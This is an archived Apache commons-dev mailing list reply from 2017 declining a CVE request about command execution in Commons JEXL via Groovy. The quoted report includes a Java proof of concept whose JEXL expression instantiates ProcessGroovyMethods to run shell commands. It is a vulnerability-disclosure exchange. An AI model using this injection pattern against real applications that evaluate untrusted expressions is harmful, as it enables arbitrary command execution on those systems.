commons-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Mark Thomas <ma...@apache.org>
Subject Re: CVE request for : Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.
Date Mon, 24 Apr 2017 16:29:59 GMT
The Apache Commons project will not be treating this as a security
vulnerability. Executing untrusted / unsanitized / unvalidated code in a
scripting environment is always dangerous.

Progress may be followed via:
https://issues.apache.org/jira/browse/JEXL-223

Mark


On 21/04/17 08:52, Cloudsecintel wrote:
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerabilitity throught
> groovy.
> 
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
> 
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> 
> public class elExp {
> public static void main(String args[]) throws IOException {
> // Create or retrieve an engine
>     JexlEngine jexl = new JexlBuilder().create();
>     // Create an expression
>     //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
>     ProcessGroovyMethods n = new ProcessGroovyMethods();
>     System.out.println(n.execute("id").toString());
>     String jexlExp =
> "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch
> /tmp/jexlExp0day\")";
>     JexlExpression e = jexl.createExpression( jexlExp );
>     try {
>    
> Process process = new ProcessBuilder("id").start();
> } catch (IOException e1) {
> // TODO Auto-generated catch block
> e1.printStackTrace();
> }
>     // Create a context and add data
>     JexlContext jc = new MapContext();
>     jc.set("foo", jexlExp );
>    
>     // Now evaluate the expression, getting the result
>     Object o = e.evaluate(jc);
>     System.out.println(o);
>     }
> }
> {code}
> 
> Sent from ProtonMail <https://protonmail.com>, Swiss-based encrypted email.
> 
> 


---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
For additional commands, e-mail: dev-help@commons.apache.org


Mime
View raw message